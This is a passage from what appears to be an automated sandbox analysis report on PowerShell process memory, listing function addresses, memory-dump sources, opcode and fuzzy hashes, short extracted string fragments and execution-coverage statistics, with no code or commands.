                                                                                                                                                            • Opcode ID: 9bf967f139e074a0a354ef87ed563345426afe99bca91cf4590d9e35257e4191
                                                                                                                                                            • Instruction ID: b46a1cb7ce79178b114fde08c50f31908342d5a1e202dc15cc43f913186c6f14
                                                                                                                                                            • Opcode Fuzzy Hash: 9bf967f139e074a0a354ef87ed563345426afe99bca91cf4590d9e35257e4191
                                                                                                                                                            • Instruction Fuzzy Hash: C77159B4A00246DFD714CF58C545E6ABBB2EF94318F148069D9099B3A6CB76EC86CBC1
                                                                                                                                                            Function 07831493 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c2af0fa47c8b4ab51929e11492b01023fcedcdcae02b07d52660c4e6c7a6f00a
                                                                                                                                                            • Instruction ID: 5ddae31d27c72975b5c72ec6d565e4ce5d8d73c751c4974c9e49c5a20293cdd9
                                                                                                                                                            • Opcode Fuzzy Hash: c2af0fa47c8b4ab51929e11492b01023fcedcdcae02b07d52660c4e6c7a6f00a
                                                                                                                                                            • Instruction Fuzzy Hash: EC51D3F0F00609AFDB10CF5CC444A6ABBA2AFA4B18F14C06AE806DB351DA36DD41CBD1
                                                                                                                                                            Function 07839E2D Relevance: .1, Instructions: 134COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 09353472d76b351129a8c51934079c8ac9b9ce6d6bfbb122c991438d9edfb30f
                                                                                                                                                            • Instruction ID: 773d32d5488fba162cf8d40297524b957394f4ba325b108e0d614bc14ba64eb7
                                                                                                                                                            • Opcode Fuzzy Hash: 09353472d76b351129a8c51934079c8ac9b9ce6d6bfbb122c991438d9edfb30f
                                                                                                                                                            • Instruction Fuzzy Hash: E541A0F17042648BCB259B7C841169ABFA29FE132CB1444AAD542DF395DEB2EC02C7E1
                                                                                                                                                            Function 07837BF6 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d40737e460b15231dcc391a9452f16dfdc578cfa60846e9309ce9746bc16af98
                                                                                                                                                            • Instruction ID: 361852ba5f9d785dc60b099d8cd8a0f2f47cf3e42ba9c4b830da31ee61522ea3
                                                                                                                                                            • Opcode Fuzzy Hash: d40737e460b15231dcc391a9452f16dfdc578cfa60846e9309ce9746bc16af98
                                                                                                                                                            • Instruction Fuzzy Hash: E0317EB4B40204ABD708EB6CC955FAF7B63AF94314F108424E9016F395CE76EC828BD1
                                                                                                                                                            Function 07830A78 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2c7fc1f9042faeb7b2d1493857aa2dc22e738b6dcc8f90a579cf026bcc809a38
                                                                                                                                                            • Instruction ID: addf64584fd2657376895f791017f038c05b2fa676bc809f73cc5990cbb9028c
                                                                                                                                                            • Opcode Fuzzy Hash: 2c7fc1f9042faeb7b2d1493857aa2dc22e738b6dcc8f90a579cf026bcc809a38
                                                                                                                                                            • Instruction Fuzzy Hash: E6214CB130031AABDB285EAE9814737B6879FE4719F24842AA50ADB384DE75D841C3E1
                                                                                                                                                            Function 07830A64 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8e1bbf6560c7789215cc0aa1c4aa68a8e9a590614c68570b8e5b9918bf9972b5
                                                                                                                                                            • Instruction ID: cbebdab3a8ef71b001361a11275cf87689c3e03d73c70d13325eb4a2e41b8824
                                                                                                                                                            • Opcode Fuzzy Hash: 8e1bbf6560c7789215cc0aa1c4aa68a8e9a590614c68570b8e5b9918bf9972b5
                                                                                                                                                            • Instruction Fuzzy Hash: 1221ADB030434A7BCB240E6E88147777F975FA1718F28842AA549CF2C5CA79D440C3F1
                                                                                                                                                            Function 04A2318D Relevance: .1, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d91d0f37ff6abda99e839e5655e9c3b578c419d06c6d45d19e809d5e17568b7a
                                                                                                                                                            • Instruction ID: 269211aef41db58160d567535a2f0ada86a3f4ff14b1718bd980459c9edafaf6
                                                                                                                                                            • Opcode Fuzzy Hash: d91d0f37ff6abda99e839e5655e9c3b578c419d06c6d45d19e809d5e17568b7a
                                                                                                                                                            • Instruction Fuzzy Hash: 5A215C74A093958FCB01DFACC99099ABFB0EF4A310B1540E6D949EB362D634ED45CBA1
                                                                                                                                                            Function 07830668 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a58b81dc484125ae9c55b0e3363a9c91fcdb8558f96693ecd411b30427ca909b
                                                                                                                                                            • Instruction ID: 07e080c5a3e622abf8db600b3f4f9f5967afcf5c6b9bbc925912aa249ee6d703
                                                                                                                                                            • Opcode Fuzzy Hash: a58b81dc484125ae9c55b0e3363a9c91fcdb8558f96693ecd411b30427ca909b
                                                                                                                                                            • Instruction Fuzzy Hash: 9701F7763003169FC76459AED40057AB79B9BE1222F14C43FD545CB254F672C845C7E0
                                                                                                                                                            Function 04A2E993 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 850b8c22d4cbc97422365494a56062733aa520daf925ad8e26a27a841690badf
                                                                                                                                                            • Instruction ID: 89cb4cacc2e2eeaa37f0c2ea108a42f34c8b2c9bfe57e4891d489d974742436a
                                                                                                                                                            • Opcode Fuzzy Hash: 850b8c22d4cbc97422365494a56062733aa520daf925ad8e26a27a841690badf
                                                                                                                                                            • Instruction Fuzzy Hash: 9E11C330C14178EBEF74DB98D6987ADB7B1AB4531EF14142AC041B6190AB7468C9DB16
                                                                                                                                                            Function 04A2FC3F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d591eec6212c590d14c1af690689065993a67b28a3ab2dc202d2233b937df7b9
                                                                                                                                                            • Instruction ID: e4e23b45a975e9ba03f8ce945771e5ed6168cb405eaafd0f2b9b8f357c8a82b9
                                                                                                                                                            • Opcode Fuzzy Hash: d591eec6212c590d14c1af690689065993a67b28a3ab2dc202d2233b937df7b9
                                                                                                                                                            • Instruction Fuzzy Hash: B2011971E001199FCB14CF98C9809ADF7B2FB88324B248669E819A7654C732AC51DB90
                                                                                                                                                            Function 07832D85 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7c9db5a1adf643be2a88da5aaf70ffb7fd78a3ff29f72ac37a68f211d24f2680
                                                                                                                                                            • Instruction ID: 53d84af25652fb8f28d8745a4ee7e36c29559207acc88cddf219cebb6d490904
                                                                                                                                                            • Opcode Fuzzy Hash: 7c9db5a1adf643be2a88da5aaf70ffb7fd78a3ff29f72ac37a68f211d24f2680
                                                                                                                                                            • Instruction Fuzzy Hash: DFE039BA60924A8FD7158A08C468A90BB72BB92665F28C1DBD0088F193C6329946C7D1

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 078318B0 Relevance: 14.2, Strings: 11, Instructions: 460COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-1543618958
                                                                                                                                                            • Opcode ID: 732a964fd3584e1ad7e838abd6e16bf885b3cb0ee1bae9fd7c521d04076fa197
                                                                                                                                                            • Instruction ID: 2e1a58bbd735a23546d838e8cf831bed666d0cfb8b3f03d3ef784a6f1885d6c1
                                                                                                                                                            • Opcode Fuzzy Hash: 732a964fd3584e1ad7e838abd6e16bf885b3cb0ee1bae9fd7c521d04076fa197
                                                                                                                                                            • Instruction Fuzzy Hash: 9CE135B1F0060E8FCB249F6D884866ABBE2AF99B10F14886AD405DB255DF31D846C7E1
                                                                                                                                                            Function 078320C0 Relevance: 12.8, Strings: 10, Instructions: 301COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-3512890053
                                                                                                                                                            • Opcode ID: 035079925b002f857909caa5e21b54e4b129ad4d0a140dbfa6c4c855b45c802d
                                                                                                                                                            • Instruction ID: 260ce1ef67e55a095cdf134c025763570fb9fa2a5d24c4ff6ab2b18695bf5d37
                                                                                                                                                            • Opcode Fuzzy Hash: 035079925b002f857909caa5e21b54e4b129ad4d0a140dbfa6c4c855b45c802d
                                                                                                                                                            • Instruction Fuzzy Hash: D7A125B170420A8FCB255E6D9C44A6EBBA1BFA2214F14847AD505CB261DB35D885C7E1
                                                                                                                                                            Function 0783C8B0 Relevance: 11.5, Strings: 9, Instructions: 228COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                                                                            • API String ID: 0-202320237
                                                                                                                                                            • Opcode ID: e72fbdc318a71e94c1dfc1376239df7be4fe1e45f000ca90cd8893ec6fc24a67
                                                                                                                                                            • Instruction ID: a85dcc46d37aea893b94bd11d5092eb3a0466d546607a3d1e5b327841d1b8c5d
                                                                                                                                                            • Opcode Fuzzy Hash: e72fbdc318a71e94c1dfc1376239df7be4fe1e45f000ca90cd8893ec6fc24a67
                                                                                                                                                            • Instruction Fuzzy Hash: 2471F3B1B0020A9FCB289F6DD444A6ABBE2AF94714F148869D801FB3D0DB32DD45C7E1
                                                                                                                                                            Function 0783D128 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                                                            • API String ID: 0-1710924510
                                                                                                                                                            • Opcode ID: 02878facb948e1142ce8050235e579e63f98775bfed123c8ee19e409cce0dd65
                                                                                                                                                            • Instruction ID: 97ea5a6a403f0597b722f96b280e74d592d1484468c0ad88683c213cfa2f93d7
                                                                                                                                                            • Opcode Fuzzy Hash: 02878facb948e1142ce8050235e579e63f98775bfed123c8ee19e409cce0dd65
                                                                                                                                                            • Instruction Fuzzy Hash: 6861B0B0B01209DBDB288E6CC544B6AB7F2AB65314F198499EC05EB395C735ED81CBF1
                                                                                                                                                            Function 0783CDC4 Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2461640029
                                                                                                                                                            • Opcode ID: c26776e7db8f130547f678e4a2135810711a7f5b7ac0c0da11bde9fe4d8f4c97
                                                                                                                                                            • Instruction ID: 8b6c8a76d85c74c27954890a0b0e4bd27baf48956c3d22c893bfe758c5297ab3
                                                                                                                                                            • Opcode Fuzzy Hash: c26776e7db8f130547f678e4a2135810711a7f5b7ac0c0da11bde9fe4d8f4c97
                                                                                                                                                            • Instruction Fuzzy Hash: EC51F0B170020ADFCB248E1CC518B6AB7A2BB61715F48846AE801EF2D0C771ED85CBF1
                                                                                                                                                            Function 0783C891 Relevance: 7.7, Strings: 6, Instructions: 161COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                                                                                            • API String ID: 0-2098638132
                                                                                                                                                            • Opcode ID: c3275f11faf1b2921babd4f396bee903051a88e732eca0d4782d7b13adeae9ca
                                                                                                                                                            • Instruction ID: 29733428bbd92ebfea596836a15e5e095717f5f9caed9eb666c516e95f8d1ad4
                                                                                                                                                            • Opcode Fuzzy Hash: c3275f11faf1b2921babd4f396bee903051a88e732eca0d4782d7b13adeae9ca
                                                                                                                                                            • Instruction Fuzzy Hash: 4D51D0F1A0020A9FCB28CE29C444A6ABBE2AF55654F1984A6D805FB2D1D731ED40CBF1
                                                                                                                                                            Function 07834BE5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-3272787073
                                                                                                                                                            • Opcode ID: 4311a3dea78fd489b326b003c3499cf3c7c6dd99a015aaa85d36e007e818a903
                                                                                                                                                            • Instruction ID: cf6ff1426511711d4afb01664118ede71e04f3fbe0cdb4d2f2cbf6a6fb92079c
                                                                                                                                                            • Opcode Fuzzy Hash: 4311a3dea78fd489b326b003c3499cf3c7c6dd99a015aaa85d36e007e818a903
                                                                                                                                                            • Instruction Fuzzy Hash: 633149B2B4438ACFDB294E6D9444576B7A1EFE1221B24886EC40ECF255DE36C847C7D1
                                                                                                                                                            Function 0783C9D6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                            • API String ID: 0-3846404929
                                                                                                                                                            • Opcode ID: ef6226d2c083c07302e3bd2fa5928bdd691624335bef050286aec7d3bdf616dd
                                                                                                                                                            • Instruction ID: c3704e6a72e651926077ce1d2421451e1b2689d22b14083e4ffe2fbf45e382d0
                                                                                                                                                            • Opcode Fuzzy Hash: ef6226d2c083c07302e3bd2fa5928bdd691624335bef050286aec7d3bdf616dd
                                                                                                                                                            • Instruction Fuzzy Hash: B93181B5B00219DFCB18DF69C444A59BBA2BB58754F158895E915FB390C632EC41CBE0
                                                                                                                                                            Function 07832280 Relevance: 6.3, Strings: 5, Instructions: 82COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2825857601
                                                                                                                                                            • Opcode ID: 7be0eb3dd3a0fda9ec6bdf16d3128cdece5d6686ab0ce44a4f859345d90548ea
                                                                                                                                                            • Instruction ID: 861375d76d6ac027bfe72c1066b77cbbdd8d9f9409819fd91f70199b0feb5faa
                                                                                                                                                            • Opcode Fuzzy Hash: 7be0eb3dd3a0fda9ec6bdf16d3128cdece5d6686ab0ce44a4f859345d90548ea
                                                                                                                                                            • Instruction Fuzzy Hash: 4721B0F161020ADBDB344E0DC844B75B7A4BF71655F1980AAE804CB274CB39D984C6E1
                                                                                                                                                            Function 0783C0E0 Relevance: 5.5, Strings: 4, Instructions: 492COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                                            • API String ID: 0-1978863864
                                                                                                                                                            • Opcode ID: bfeae8ef799e44930661237dbfc7d3ce57d08efa8fcdb6d8fad153228c5213bd
                                                                                                                                                            • Instruction ID: b944394ecae7221c1adace185ffb557c3f1efb3050273657f5902b39fbf4b6e5
                                                                                                                                                            • Opcode Fuzzy Hash: bfeae8ef799e44930661237dbfc7d3ce57d08efa8fcdb6d8fad153228c5213bd
                                                                                                                                                            • Instruction Fuzzy Hash: 9AF103B170430A9FDB258F6CD844BAABBA2BF96314F14846AE405EB2D1DB35D844C7F1
                                                                                                                                                            Function 078390B8 Relevance: 5.2, Strings: 4, Instructions: 248COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                            • Opcode ID: 05dec62150972f9770a210b8ae4a67154d67f63ddd94aa92b965cfa3e834b699
                                                                                                                                                            • Instruction ID: f34522084ca81ffa39dbbbea4230a1cd5a86fcbf586198ad3ae905d9a05eadea
                                                                                                                                                            • Opcode Fuzzy Hash: 05dec62150972f9770a210b8ae4a67154d67f63ddd94aa92b965cfa3e834b699
                                                                                                                                                            • Instruction Fuzzy Hash: DF818EF1B0430A8FC7259F6C94006ABBFB5AFE2218F1580BAC455DB251DBB5E885C7D2
                                                                                                                                                            Function 0783DBA8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                                                            • API String ID: 0-3596674671
                                                                                                                                                            • Opcode ID: 55ae53f784f77571efc6e1bd07ecb25eda57fee95063b659cacca63fa71ab31a
                                                                                                                                                            • Instruction ID: 1f51f5cc2dfa532526f73a255044c4dd4b80da8fb29f83fcbbcc907c42f6f5d6
                                                                                                                                                            • Opcode Fuzzy Hash: 55ae53f784f77571efc6e1bd07ecb25eda57fee95063b659cacca63fa71ab31a
                                                                                                                                                            • Instruction Fuzzy Hash: 004180B1B10209DBCB24CE5DC144AAAB7F2AF55725F19C069D809AB395C771DD42CBE0
                                                                                                                                                            Function 07830E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                            • Opcode ID: 100cddd11d35ed867d14908296dae548d0ae3816f265bfddc6c00e545c593261
                                                                                                                                                            • Instruction ID: 995b7ffc81a44f4e1566b4d26e0b41c90792a030978afad585f3d1c0cb811203
                                                                                                                                                            • Opcode Fuzzy Hash: 100cddd11d35ed867d14908296dae548d0ae3816f265bfddc6c00e545c593261
                                                                                                                                                            • Instruction Fuzzy Hash: BE2127B170030E5BD7385D6E9840B27BADB9BE0715F24862AE506CF385DE76D840C2E2

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:2%
                                                                                                                                                            Total number of Nodes:1128
                                                                                                                                                            Total number of Limit Nodes:22
